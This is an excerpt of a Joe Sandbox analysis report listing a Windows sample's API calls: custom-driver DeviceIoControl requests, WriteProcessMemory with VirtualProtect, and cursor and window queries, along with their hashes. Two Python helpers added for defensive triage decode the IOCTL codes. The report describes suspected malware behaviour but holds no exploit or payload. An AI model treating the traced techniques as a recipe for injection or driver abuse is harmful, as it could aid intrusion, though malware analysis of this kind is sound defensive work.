• DeviceIoControl.KERNEL32(?,00222048,?,00000018,?,00000008,?,00000000), ref: 0049C973
  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ControlDeviceMessage
• String ID:
• API String ID: 1404884426-0
• Opcode ID: f7088646b29ca34313ec5ccab273d3104602d0a40b59979059404d2b8059df52
• Instruction ID: e00af882239d7b347fe9c67c301ebd534e22ce9c7bf62c0a5a5fde76a62631fd
• Opcode Fuzzy Hash: f7088646b29ca34313ec5ccab273d3104602d0a40b59979059404d2b8059df52
• Instruction Fuzzy Hash: 107112B1E40309EBDF10DF95CDC6BAE7BB4AB19314F10402AE6057B391D3795A508BA9
APIs
• DeviceIoControl.KERNEL32(?,?,?,00000018,?,00000008,?,00000000), ref: 0049E8E5
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ControlDevice
• String ID:
• API String ID: 2352790924-0
• Opcode ID: e831a275df95eeb10890ba1b634f20a658ccec75415fbddf49917d616db861e0
• Instruction ID: 5bd4aa697ac1034cf580349c3c08ade346b8d825d2ea0b0711e7f5e3ded653b0
• Opcode Fuzzy Hash: e831a275df95eeb10890ba1b634f20a658ccec75415fbddf49917d616db861e0
• Instruction Fuzzy Hash: 7F6136F1E40309ABDF50DF96DD86BAEBFB4AF08304F10407AE60477291D6795A50CB59
APIs
• IIDFromString.COMBASE(?,00000000), ref: 004046F4
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: FromString
• String ID:
• API String ID: 1694596556-0
• Opcode ID: 95a4f50a84fbc9b96cd7957e7a7656921229c88b308757b5cf856cd9de23669c
• Instruction ID: a8b6aab28b1d87ca97166e21ed405e2568da21e9315250d96a033eccf1f9a1a5
• Opcode Fuzzy Hash: 95a4f50a84fbc9b96cd7957e7a7656921229c88b308757b5cf856cd9de23669c
• Instruction Fuzzy Hash: 095183F2E002159BEB40DB69ECC1B5AB7E8EF59324F180036E905EB341E779AD14C766
APIs
• DeviceIoControl.KERNEL32(?,00222014,?,00000018,?,00000008,?,00000000), ref: 0049E3CA
  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ControlDeviceMessage
• String ID:
• API String ID: 1404884426-0
• Opcode ID: a21ac81d700e5ac4341872182619fddb8151740b77b291bf2ea62385c52a3290
• Instruction ID: f4d38ee63f8403bc3912a389370e22b87f789c6d315d9236119e9f4301a71932
• Opcode Fuzzy Hash: a21ac81d700e5ac4341872182619fddb8151740b77b291bf2ea62385c52a3290
• Instruction Fuzzy Hash: DD5174B0E40319EBDF10DF96CC86BAE7BB4AF08714F10452AE6147B3D2D7795A108B59
APIs
• DeviceIoControl.KERNEL32(?,00222058,?,00000018,?,00000008,?,00000000), ref: 0049CBE8
  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ControlDeviceMessage
• String ID:
• API String ID: 1404884426-0
• Opcode ID: 8291c089f170d1e03003a87b3e600da69cddb2e3eec1f01f68a088a14c145e02
• Instruction ID: afd402f90841313596242ee053f0730fe8dd4410ebf9128321a31606de6587a6
• Opcode Fuzzy Hash: 8291c089f170d1e03003a87b3e600da69cddb2e3eec1f01f68a088a14c145e02
• Instruction Fuzzy Hash: 006173B1E40319ABDF10DF95CDC6BAE7BB4AF08314F10452AE618BB3C1D7795A108B69
APIs
• DeviceIoControl.KERNEL32(00000001,002220E9,?,00000018,?,00000008,?,00000000), ref: 004B2D33
  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: aa11473839054324e515e8eef2a43f93922f3122c3ea11f1c322b4152499502a
                                                                • Instruction ID: cfbad1ead4f9560ec85fdfb2e410c7878e5bc432a1edc1a19094dae036ffcced
                                                                • Opcode Fuzzy Hash: aa11473839054324e515e8eef2a43f93922f3122c3ea11f1c322b4152499502a
                                                                • Instruction Fuzzy Hash: 306145B0E40319EBDF10DF95CD86BEE7BB4BB08304F10452AE6057B381D3B95A108BA9
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222024,?,00000018,?,00000008,?,00000000), ref: 0049C2DB
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 6d384aded477d0ac4ce3ad0023731c029c9437c44bd07a91ed7cfde9678cdbea
                                                                • Instruction ID: 8e48bbca02e33de7053ccbbfce8ffaf4d8d5879e49821f2cf61633e6e3f36d89
                                                                • Opcode Fuzzy Hash: 6d384aded477d0ac4ce3ad0023731c029c9437c44bd07a91ed7cfde9678cdbea
                                                                • Instruction Fuzzy Hash: 5B5156B1E40319EBDF20DFA5DCC6BAEBBB4AF08314F10442AEA05B7381D7795A108B55
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,0022201C,?,00000018,?,00000008,?,00000000), ref: 0049E162
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 4940e388daa41ab8471c09562efc06500ab93ef7195a1dac66c8a3f65a95f3d3
                                                                • Instruction ID: 737eaa5bffacee1542f3ce06e52fb28de966dbe0814050d69f851eb8bc267807
                                                                • Opcode Fuzzy Hash: 4940e388daa41ab8471c09562efc06500ab93ef7195a1dac66c8a3f65a95f3d3
                                                                • Instruction Fuzzy Hash: 1B5185B1E40319EBDF10DF96CC86BAE7BB5AF08310F14446EE604BB391D3795A108B59
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222054,?,00000020,?,00000008,?,00000000), ref: 0049C6F0
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 16978b414df6d8f785b4921b18c6491b05f713c5245735083fb38240d7a7efa6
                                                                • Instruction ID: b8df226b9aae79d58310e339e487b03c33176ef852d247166fc81e3937556c1f
                                                                • Opcode Fuzzy Hash: 16978b414df6d8f785b4921b18c6491b05f713c5245735083fb38240d7a7efa6
                                                                • Instruction Fuzzy Hash: CB5155B1E4031AABDF10DFE5CCC5BAE7BB4AF08314F10446AE605BB382D3795A108B59
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,?,00000004), ref: 004C4BBF
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 82bd44fc71ac042eded53aee86052a0248b65a40bf11a5cef351d30b165520b4
                                                                • Instruction ID: 582be7e361a78e5fd245c4c7436ddcc2297154965499e5fbc042dafd01c14ab9
                                                                • Opcode Fuzzy Hash: 82bd44fc71ac042eded53aee86052a0248b65a40bf11a5cef351d30b165520b4
                                                                • Instruction Fuzzy Hash: 88719130C0491DEBCF00AFE2E9596EEBB74FF88305F618099E0A175058DB7A4A75CB19
                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000040,00000001,?,?,?,?,00000000,00000000,00000001), ref: 00446AF4
                                                                  • Part of subcall function 00446B2B: VirtualProtect.KERNEL32(00000040,00000001,?,00000000), ref: 00446B8B
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcessProtectVirtualWrite
                                                                • String ID:
                                                                • API String ID: 214326562-0
                                                                • Opcode ID: fad1875c12a1367eba67d216d20904d6f0fd0f51eb21090476fe7f982c3c1b1a
                                                                • Instruction ID: c87de87545b18a9664a82c7bcd604e5904ce667f15f30f25660acb4a4e102b05
                                                                • Opcode Fuzzy Hash: fad1875c12a1367eba67d216d20904d6f0fd0f51eb21090476fe7f982c3c1b1a
                                                                • Instruction Fuzzy Hash: 484179B5E40209BBFB10DF91DC86FAE7774EB05705F104059FA04BA291D7B55E208B6A
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222050,?,00000020,?,00000008,?,00000000), ref: 0049C575
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: 654414ead32c8c0ce55ec42a353a33baa3e443f2379d8576a0dd6c04bac783a8
                                                                • Instruction ID: ab91015293e3875629d7b56a84d44157946560d0a51d4492d07994485bf956ff
                                                                • Opcode Fuzzy Hash: 654414ead32c8c0ce55ec42a353a33baa3e443f2379d8576a0dd6c04bac783a8
                                                                • Instruction Fuzzy Hash: E6510CB5E00319EBDF10DF95C8C1B9EBBB4FB08314F10446AEA04AB342D375AA108B65
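Decoding the control codes that this listing shows being passed to DeviceIoControl (0x2220E9, 0x222024, 0x22201C, 0x222054, 0x222050 and, further down, 0x2221D8), as an added example that is not part of the Joe Sandbox report or of the analysed sample: the script splits each 32-bit IOCTL into its CTL_CODE fields (device type, access, function number, transfer method) so the calls behind the "communicate with device drivers" signature can be classified without having the driver in hand. The FILE_DEVICE_* table is a subset of the Windows SDK devioctl.h constants, and the 0x800 boundary between Microsoft-reserved and vendor-defined function numbers is the one documented in that header; the REPORT_IOCTLS tuple and the helper names are constructed for this example.

```python
"""Decode Windows I/O control codes into their CTL_CODE fields.

Added example, not code from the Joe Sandbox report or the sample. Layout of a
32-bit IOCTL as built by the SDK CTL_CODE macro:

    DeviceType (16 bits) | Access (2 bits) | Function (12 bits) | Method (2 bits)
"""

from dataclasses import dataclass

# Subset of the FILE_DEVICE_* constants from the Windows SDK devioctl.h.
DEVICE_TYPES = {
    0x0007: "FILE_DEVICE_DISK",
    0x0009: "FILE_DEVICE_FILE_SYSTEM",
    0x000B: "FILE_DEVICE_KEYBOARD",
    0x0011: "FILE_DEVICE_NAMED_PIPE",
    0x0012: "FILE_DEVICE_NETWORK",
    0x0017: "FILE_DEVICE_PHYSICAL_NETCARD",
    0x0022: "FILE_DEVICE_UNKNOWN",
    0x002D: "FILE_DEVICE_MASS_STORAGE",
}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS | FILE_WRITE_ACCESS")

# devioctl.h: function codes 0x000-0x7FF are reserved for Microsoft,
# 0x800-0xFFF are left to third-party (custom) drivers.
CUSTOM_FUNCTION_BASE = 0x800


@dataclass(frozen=True)
class Ioctl:
    code: int
    device_type: int
    access: int
    function: int
    method: int

    @property
    def device_name(self) -> str:
        return DEVICE_TYPES.get(self.device_type, f"0x{self.device_type:04X} (unlisted)")

    @property
    def is_custom(self) -> bool:
        """True when the function number lies in the vendor-defined range."""
        return self.function >= CUSTOM_FUNCTION_BASE

    def describe(self) -> str:
        kind = "custom" if self.is_custom else "Microsoft-reserved"
        return (f"0x{self.code:06X}: {self.device_name}, function 0x{self.function:03X}"
                f" ({kind}), {METHODS[self.method]}, {ACCESS[self.access]}")


def decode_ioctl(code: int) -> Ioctl:
    """Invert CTL_CODE(DeviceType, Function, Method, Access) =
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError("IOCTL must be a 32-bit value")
    return Ioctl(
        code=code,
        device_type=(code >> 16) & 0xFFFF,
        access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
    )


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Forward direction, identical to the SDK macro; used to cross-check decode_ioctl."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Control codes taken from the DeviceIoControl calls in this report's function listing.
REPORT_IOCTLS = (0x2220E9, 0x222024, 0x22201C, 0x222054, 0x222050, 0x2221D8)


def summarize(codes=REPORT_IOCTLS) -> list:
    """One human-readable line per control code."""
    return [decode_ioctl(c).describe() for c in codes]


if __name__ == "__main__":
    for line in summarize():
        print(line)
```

All six codes decode to FILE_DEVICE_UNKNOWN with function numbers in the vendor range (0x807 to 0x876), so the sample is talking to a third-party driver's private interface rather than to a documented system device; 0x2220E9 alone uses METHOD_IN_DIRECT, the other five METHOD_BUFFERED. The 0x18/0x20-byte input and 8-byte output buffer sizes visible in the argument columns above are the other detail worth carrying into a driver-side triage.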
                                                                APIs
                                                                • ClientToScreen.USER32(00000001,00000000), ref: 004A26F3
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClientScreen
                                                                • String ID:
                                                                • API String ID: 3917795285-0
                                                                • Opcode ID: ff5a516927b6fd9b30ac5f6d3490f0b69dc686f5eb22e5b4bcb05aa9780407a4
                                                                • Instruction ID: 3c4937472f134a0a5ed4fc5feeaf850ee7c79077d3b3ef86de29c7c4503e7d5d
                                                                • Opcode Fuzzy Hash: ff5a516927b6fd9b30ac5f6d3490f0b69dc686f5eb22e5b4bcb05aa9780407a4
                                                                • Instruction Fuzzy Hash: 5551E174E00208EBDF00DF99D5C5B9DBBB0FF09304F5080A9E645AB252D7799E60DB66
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00470785
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: c31d8e5cd0df59b9a291e70f7c49a9715559a29b586af889b26a60e9d2b762f1
                                                                • Instruction ID: 8a1c20e4b8b1d5c7d627422891df3ccfbb6e4846d7e40f7394e751f8a80812f5
                                                                • Opcode Fuzzy Hash: c31d8e5cd0df59b9a291e70f7c49a9715559a29b586af889b26a60e9d2b762f1
                                                                • Instruction Fuzzy Hash: CB4168B5E00308FBEB50DF95DC86FAF77B8DB04704F14406AFA04FA282D679A9108B59
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,002221D8,?,00000018,?,?,?,00000000), ref: 0049C18A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: 81e01e02ecfe56f313394893fa4ea270a473a364a7c262041bb0c3332370e662
                                                                • Instruction ID: 7f3f7621c13dad16b28b5e4f53a318b3d6b3b23024b951e5234537e9d0af132b
                                                                • Opcode Fuzzy Hash: 81e01e02ecfe56f313394893fa4ea270a473a364a7c262041bb0c3332370e662
                                                                • Instruction Fuzzy Hash: FC410DB1E00309AFDF40DFA5DDC6B9EBBB4FF08304F04446AE604A7242D7759A109BA5
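Reading the DeviceIoControl record above by hand is error-prone: the only resolved arguments are the control code (002221D8), the input-buffer size (00000018) and lpOverlapped (0), and the control code says nothing about the target driver until it is split into its CTL_CODE fields. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample. It parses the "APIs" line layout as it appears in the records on this page (the layout is assumed from those lines only), names the positional arguments with the Win32 DeviceIoControl prototype and decodes the IOCTL with the standard winioctl.h bit layout. The sample input is constructed from the lines on this page.

```python
"""Triage helper for the "APIs" lines of a Joe Sandbox function record.

Added example; not part of the Joe Sandbox report or of the analysed sample.
Assumed line layout (taken from the records on this page):
    <Function>.<MODULE>(<arg>,<arg>,...), ref: <address>
optionally prefixed with "Part of subcall function <address>: ".
"?" marks an argument the analyser could not resolve.
"""
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample input: the DeviceIoControl and GetTempFileNameA records
# on this page, plus one "Part of subcall" line from the GetCursorPos record.
SAMPLE_LINES = [
    "• DeviceIoControl.KERNEL32(?,002221D8,?,00000018,?,?,?,00000000), ref: 0049C18A",
    "• GetTempFileNameA.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00450D62",
    "  • Part of subcall function 00464345: GetForegroundWindow.USER32(?,00464250), ref: 0046437A",
]

API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    function: str
    module: str
    args: Tuple[Optional[int], ...]  # None where the report prints "?"
    ref: int                         # address of the call instruction
    subcall_of: Optional[int]        # function the report attributes the call to


def parse_api_line(line: str) -> ApiCall:
    """Parse one "APIs" bullet into its parts; hex fields become ints."""
    m = API_LINE.search(line)
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args = tuple(None if a == "?" else int(a, 16)
                 for a in m.group("args").split(",") if a)
    sub = m.group("sub")
    return ApiCall(m.group("func"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


# CTL_CODE layout from winioctl.h:
#   bits 31..16 device type, 15..14 required access, 13..2 function, 1..0 method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM",
                0x12: "FILE_DEVICE_NETWORK", 0x22: "FILE_DEVICE_UNKNOWN"}


def decode_ioctl(code: int) -> dict:
    """Split a DeviceIoControl control code into its four CTL_CODE fields."""
    return {"device_type": (code >> 16) & 0xFFFF,
            "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF,
            "method": code & 0x3}


def ctl_code(device_type: int, function: int, method: int, access: int = 0) -> int:
    """Inverse of decode_ioctl, same arithmetic as the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Positional parameter names of the Win32 prototype, used to label the record.
DEVICE_IO_CONTROL_PARAMS = ("hDevice", "dwIoControlCode", "lpInBuffer", "nInBufferSize",
                            "lpOutBuffer", "nOutBufferSize", "lpBytesReturned", "lpOverlapped")


def describe_device_io_control(call: ApiCall) -> dict:
    """Name the arguments of a DeviceIoControl record and decode its IOCTL."""
    if call.function != "DeviceIoControl":
        raise ValueError("expected a DeviceIoControl record")
    named = dict(zip(DEVICE_IO_CONTROL_PARAMS, call.args))
    code = named.get("dwIoControlCode")
    if code is None:
        raise ValueError("control code not resolved in this record")
    fields = decode_ioctl(code)
    fields["device_type_name"] = DEVICE_TYPES.get(fields["device_type"], "not in table")
    fields["access_name"] = ACCESS[fields["access"]]
    fields["method_name"] = METHODS[fields["method"]]
    named["ioctl"] = fields
    # A NULL lpOverlapped means the call blocks until the driver completes it.
    named["synchronous"] = named.get("lpOverlapped") == 0
    return named


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        call = parse_api_line(line)
        print(f"{call.function}.{call.module} @ {call.ref:08X}  args={call.args}")
        if call.function == "DeviceIoControl":
            for k, v in describe_device_io_control(call)["ioctl"].items():
                print(f"    {k}: {v:#x}" if isinstance(v, int) else f"    {k}: {v}")
```

For the record above this decodes to device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x876, METHOD_BUFFERED, FILE_ANY_ACCESS, a 24-byte input buffer and a synchronous call. Because hDevice is unresolved ("?"), the record by itself does not identify the device object; the CreateFile that produced the handle has to be located elsewhere in the report before the IOCTL can be attributed to a driver.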
                                                                APIs
                                                                • GetTempFileNameA.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00450D62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileNameTemp
                                                                • String ID:
                                                                • API String ID: 745986568-0
                                                                • Opcode ID: 969a77d809da31152a14b478da47bad69baa0823b25a9292252d7695a5ad7915
                                                                • Instruction ID: 94ada1855d7710cedb05b05438b261dbcf0a1c809f3297d9211da0cf9b069da8
                                                                • Opcode Fuzzy Hash: 969a77d809da31152a14b478da47bad69baa0823b25a9292252d7695a5ad7915
                                                                • Instruction Fuzzy Hash: E2318575A00304BFEB50EFA5DCC2FAE37B89B18314F14046AFA08AB243D675AD588755
                                                                APIs
                                                                • GetCursorPos.USER32(00000000), ref: 0046426D
                                                                  • Part of subcall function 00464345: GetForegroundWindow.USER32(?,00464250), ref: 0046437A
                                                                  • Part of subcall function 00464345: ClientToScreen.USER32(00000000,00000001), ref: 004643CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClientCursorForegroundScreenWindow
                                                                • String ID:
                                                                • API String ID: 3982838974-0
                                                                • Opcode ID: d9ca2dd8ef537604625153b146f5d3752cb894a9baad6b76fc1f382740ff85b5
                                                                • Instruction ID: 6c5561459313cfab8a67fcd032739c1c6d9c0a15a8597213b65b7d9c58ef2b74
                                                                • Opcode Fuzzy Hash: d9ca2dd8ef537604625153b146f5d3752cb894a9baad6b76fc1f382740ff85b5
                                                                • Instruction Fuzzy Hash: 7541EBB5D00208EBDF40EFA5D8C5BADBBB0FF0C304F1080A9D5597A246D7755A64CB66
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 814b53bad2891968ca2a62605e51bd2526c8143a8f440eabf574c001446bda79
                                                                • Instruction ID: c26dde67f9451de340a57ef4328caa0910851afca8f8aa2cbd7d09684aa2f955
                                                                • Opcode Fuzzy Hash: 814b53bad2891968ca2a62605e51bd2526c8143a8f440eabf574c001446bda79
                                                                • Instruction Fuzzy Hash: 6441C030C0450CEBEF01AF91E845BEEBF31EF48705F1180AAE550391A5CB7A0A75AB69
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,00000006,00000000), ref: 004B894C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
